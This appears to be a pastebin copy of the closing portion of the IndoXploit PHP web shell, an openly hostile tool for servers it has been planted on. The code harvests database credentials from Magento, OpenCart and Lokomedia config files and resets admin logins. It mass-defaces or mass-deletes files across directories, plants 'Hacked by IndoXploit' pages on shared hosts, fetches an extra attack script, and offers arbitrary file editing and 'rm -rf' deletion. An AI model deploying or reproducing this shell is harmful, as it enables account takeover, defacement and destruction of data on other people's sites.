  1557. $target = $result2[value];
  1558. if($target == '') {
  1559. $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1560. }
  1561. else {
  1562. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1563. }
  1564. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1565. print "Config => ".$file_conf."<br>";
  1566. print "CMS => Magento<br>";
  1567. print $url_target;
  1568. if(!$update OR !$conn OR !$db) {
  1569. print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1570. }
  1571. else {
  1572. print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1573. }
  1574. mysql_close($conn);
  1575. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1576. $dbhost = getValue($config,"'DB_HOSTNAME', '","'");
  1577. $dbuser = getValue($config,"'DB_USERNAME', '","'");
  1578. $dbpass = getValue($config,"'DB_PASSWORD', '","'");
  1579. $dbname = getValue($config,"'DB_DATABASE', '","'");
  1580. $dbprefix = getValue($config,"'DB_PREFIX', '","'");
  1581. $prefix = $dbprefix."user";
  1582. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1583. $db = mysql_select_db($dbname);
  1584. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1585. $result = mysql_fetch_array($q);
  1586. $id = $result[user_id];
  1587. $target = getValue($config,"HTTP_SERVER', '","'");
  1588. if($target == '') {
  1589. $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1590. }
  1591. else {
  1592. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1593. }
  1594. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1595. print "Config => ".$file_conf."<br>";
  1596. print "CMS => OpenCart<br>";
  1597. print $url_target;
  1598. if(!$update OR !$conn OR !$db) {
  1599. print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1600. }
  1601. else {
  1602. print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1603. }
  1604. mysql_close($conn);
  1605. }
  1606. elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1607. $dbhost = getValue($config,'server = "','"');
  1608. $dbuser = getValue($config,'username = "','"');
  1609. $dbpass = getValue($config,'password = "','"');
  1610. $dbname = getValue($config,'database = "','"');
  1611. $prefix = "users";
  1612. $option = "identitas";
  1613. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1614. $db = mysql_select_db($dbname);
  1615. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1616. $result = mysql_fetch_array($q);
  1617. $target = $result[alamat_website];
  1618. if($target == '') {
  1619. $target2 = $result[url];
  1620. $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1621. if($target2 == '') {
  1622. $url_target2 = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1623. }
  1624. else {
  1625. $cek_login3 = file_get_contents("$target2/adminweb/");
  1626. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1627. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1628. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1629. }
  1630. elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1631. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1632. }
  1633. else {
  1634. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1635. }
  1636. }
  1637. } else {
  1638. $cek_login = file_get_contents("$target/adminweb/");
  1639. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1640. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1641. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1642. }
  1643. elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1644. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1645. }
  1646. else {
  1647. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1648. }
  1649. }
  1650. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1651. print "Config => ".$file_conf."<br>";
  1652. print "CMS => Lokomedia<br>";
  1653. if(preg_match("/Can't get domain name/", $url_target)) {
  1654. print $url_target2;
  1655. }
  1656. else {
  1657. print $url_target;
  1658. }
  1659. if(!$update OR !$conn OR !$db) {
  1660. print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1661. }
  1662. else {
  1663. print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1664. }
  1665. mysql_close($conn);
  1666. }
  1667. }
  1668. }
  1669. }
  1670. else {
  1671. print "<center>
  1672. <h1>Mass Password Change</h1>
  1673. <form method='post'>
  1674. <input type='radio' name='config_type' value='dir' checked>DIR Config<input type='radio' name='config_type' value='link'>LINK Config<br>
  1675. <input type='text' size='50' name='config_dir' value='".path()."'><br><br>
  1676. Set User & Pass: <br>
  1677. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
  1678. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
  1679. <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 215px; margin: 5px auto;' type='submit' name='hajar' value='Hajar!'>
  1680. </form></center>";
  1681. }
  1682. }
  1683. elseif($_GET['do'] === "mass") {
  1684. if($_POST['start']) {
  1685. if($_POST['mass_type'] === 'singledir') {
  1686. print "<div style='margin: 5px auto; padding: 5px'>";
  1687. massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']);
  1688. print "</div>";
  1689. }
  1690. elseif($_POST['mass_type'] === 'alldir') {
  1691. print "<div style='margin: 5px auto; padding: 5px'>";
  1692. massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir");
  1693. print "</div>";
  1694. }
  1695. elseif($_POST['mass_type'] === "delete") {
  1696. print "<div style='margin: 5px auto; padding: 5px'>";
  1697. massdelete($_POST['d_dir'], $_POST['d_file']);
  1698. print "</div>";
  1699. }
  1700. }
  1701. else {
  1702. print "<center><form method='post'>
  1703. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  1704. <input type='radio' name='mass_type' value='singledir' checked>Mass Deface Single Directory<input type='radio' name='mass_type' value='alldir'>Mass Deface All Directory<input type='radio' name='mass_type' value='delete'>Mass Delete File<br>
  1705. <span>( kosongkan 'Index File' jika memilih Mass Delete File )</span><br><br>
  1706. <font style='text-decoration: underline;'>Folder:</font><br>
  1707. <input type='text' name='d_dir' value='".path()."' style='width: 450px;' height='10'><br><br>
  1708. <font style='text-decoration: underline;'>Filename:</font><br>
  1709. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br><br>
  1710. <font style='text-decoration: underline;'>Index File:</font><br>
  1711. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  1712. <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='start' value='Mass'>
  1713. </form></center>";
  1714. }
  1715. }
  1716. elseif($_GET['do'] == 'fakeroot') {
  1717. ob_start();
  1718.  
  1719. $site = explode("\r\n", $_POST['url']);
  1720. $user = usergroup()->name;
  1721. $file = $_POST['file'];
  1722.  
  1723. if(!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "I think this server not using shared host :("));
  1724.  
  1725.  
  1726. if($_POST['reverse']) {
  1727. if(!is_writable($_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "Directory '".$_SERVER['DOCUMENT_ROOT']."' is not writeable."));
  1728. if(!is_writable(dirname($_SERVER['DOCUMENT_ROOT']))) die(color(1, 1, "Directory '".dirname($_SERVER['DOCUMENT_ROOT'])."' is not writeable."));
  1729.  
  1730. save($_SERVER['DOCUMENT_ROOT']."/".$file, "w", $_POST['script']);
  1731. save(dirname($_SERVER['DOCUMENT_ROOT'])."/".$file, "w", $_POST['script']);
  1732.  
  1733. foreach($site as $url) {
  1734. $cek = curl("$url/~$user/$file");
  1735. if(preg_match("/hacked/i", $cek)) {
  1736. print "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1737. }
  1738. }
  1739. } else {
  1740. print "<center><form method='post'>
  1741. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1742. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1743. Domain: <br>
  1744. <textarea style='width: 450px; height: 250px;' name='url'>";
  1745. print implode("\n", reverse());
  1746. print "</textarea><br>
  1747. <font style='text-decoration: underline;'>Index File:</font><br>
  1748. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  1749. <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='reverse' value='Scan Fake Root!'>
  1750. </form><br>
  1751. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1752. }
  1753. }
  1754. elseif($_GET['do'] === 'lre') {
  1755. if(file_exists("makman.php")) {
  1756. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
  1757. }
  1758. else {
  1759. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Makman'."));
  1760. if(getfile("LRE")) {
  1761. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
  1762. }
  1763. else {
  1764. print color(1, 1, "Error while downloading file makman.");
  1765. @unlink("makman.php");
  1766. }
  1767. }
  1768.  
  1769. }
  1770. }
  1771. elseif(isset($_GET['act'])) {
  1772. if($_GET['act'] === 'newfile') {
  1773. if($_POST['save']) {
  1774. $filename = htmlspecialchars($_POST['filename']);
  1775. $fopen = fopen($filename, "a+");
  1776. if($fopen) {
  1777. $act = "<script>window.location='?act=edit&dir=".path()."&file=".$_POST['filename']."';</script>";
  1778. }
  1779. else {
  1780. $act = color(1, 1, "Permission Denied!");
  1781. }
  1782. }
  1783. print $act;
  1784. print "<form method='post'>
  1785. Filename: <input type='text' name='filename' value='".path()."/newfile.php' style='width: 450px;' height='10'>
  1786. <input type='submit' class='input' name='save' value='SUBMIT'>
  1787. </form>";
  1788. }
  1789. elseif($_GET['act'] === 'newfolder') {
  1790. if($_POST['save']) {
  1791. $foldername = path().'/'.htmlspecialchars($_POST['foldername']);
  1792. if(!@mkdir($foldername)) {
  1793. $act = color(1, 1, "Permission Denied!");
  1794. }
  1795. else {
  1796. $act = "<script>window.location='?dir=".path()."';</script>";
  1797. }
  1798. }
  1799. print $act;
  1800. print "<form method='post'>
  1801. Folder Name: <input type='text' name='foldername' style='width: 450px;' height='10'>
  1802. <input type='submit' class='input' name='save' value='SUBMIT'>
  1803. </form>";
  1804. }
  1805. elseif($_GET['act'] === 'rename_folder') {
  1806. if($_POST['save']) {
  1807. $rename_folder = rename(path(), "".dirname(path()).DIRECTORY_SEPARATOR.htmlspecialchars($_POST['foldername']));
  1808. if($rename_folder) {
  1809. $act = "<script>window.location='?dir=".dirname(path())."';</script>";
  1810. }
  1811. else {
  1812. $act = color(1, 1, "Permission Denied!");
  1813. }
  1814. print "$act<br>";
  1815. }
  1816. print "<form method='post'>
  1817. <input type='text' value='".basename(path())."' name='foldername' style='width: 450px;' height='10'>
  1818. <input type='submit' class='input' name='save' value='RENAME'>
  1819. </form>";
  1820. }
  1821. elseif($_GET['act'] === 'delete_folder') {
  1822. if(is_dir(path())) {
  1823. if(is_writable(path())) {
  1824. @rmdir(path());
  1825. if(!@rmdir(path()) AND OS() === "Linux") @exe("rm -rf ".path());
  1826. if(!@rmdir(path()) AND OS() === "Windows") @exe("rmdir /s /q ".path());
  1827. $act = "<script>window.location='?dir=".dirname(path())."';</script>";
  1828. }
  1829. else {
  1830. $act = color(1, 1, "Could not remove directory '".basename(path())."'");
  1831. }
  1832. }
  1833. print $act;
  1834. }
  1835. elseif($_GET['act'] === 'view') {
  1836. print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
  1837. print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
  1838. print "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1839. }
  1840. elseif($_GET['act'] === 'edit') {
  1841. if($_POST['save']) {
  1842. $save = file_put_contents($_GET['file'], $_POST['src']);
  1843. if($save) {
  1844. $act = color(1, 2, "File Saved!");
  1845. }
  1846. else {
  1847. $act = color(1, 1, "Permission Denied!");
  1848. }
  1849. print "$act<br>";
  1850. }
  1851.  
  1852. print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
  1853. print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
  1854. print "<form method='post'>
  1855. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1856. <input type='submit' class='input' value='SAVE' name='save' style='width: 500px;'>
  1857. </form>";
  1858. }
  1859. elseif($_GET['act'] === 'rename') {
  1860. if($_POST['save']) {
  1861. $rename = rename($_GET['file'], path().DIRECTORY_SEPARATOR.htmlspecialchars($_POST['filename']));
  1862. if($rename) {
  1863. $act = "<script>window.location='?dir=".path()."';</script>";
  1864. }
  1865. else {
  1866. $act = color(1, 1, "Permission Denied!");
  1867. }
  1868. print "$act<br>";
  1869. }
  1870.  
  1871. print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
  1872. print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
  1873. print "<form method='post'>
  1874. <input type='text' value='".basename($_GET['file'])."' name='filename' style='width: 450px;' height='10'>
  1875. <input type='submit' class='input' name='save' value='RENAME'>
  1876. </form>";
  1877. }
  1878. elseif($_GET['act'] === 'delete') {
  1879. $delete = unlink($_GET['file']);
  1880. if($delete) {
  1881. $act = "<script>window.location='?dir=".path()."';</script>";
  1882. }
  1883. else {
  1884. $act = color(1, 1, "Permission Denied!");
  1885. }
  1886. print $act;
  1887. }
  1888. }
  1889. else {
  1890. files_and_folder();
  1891. }
  1892. }
  1893.  
  1894. serverinfo();
  1895. action();
  1896. ?>
  1897. </body>
  1898. </html>
Add Comment
Please, Sign In to add comment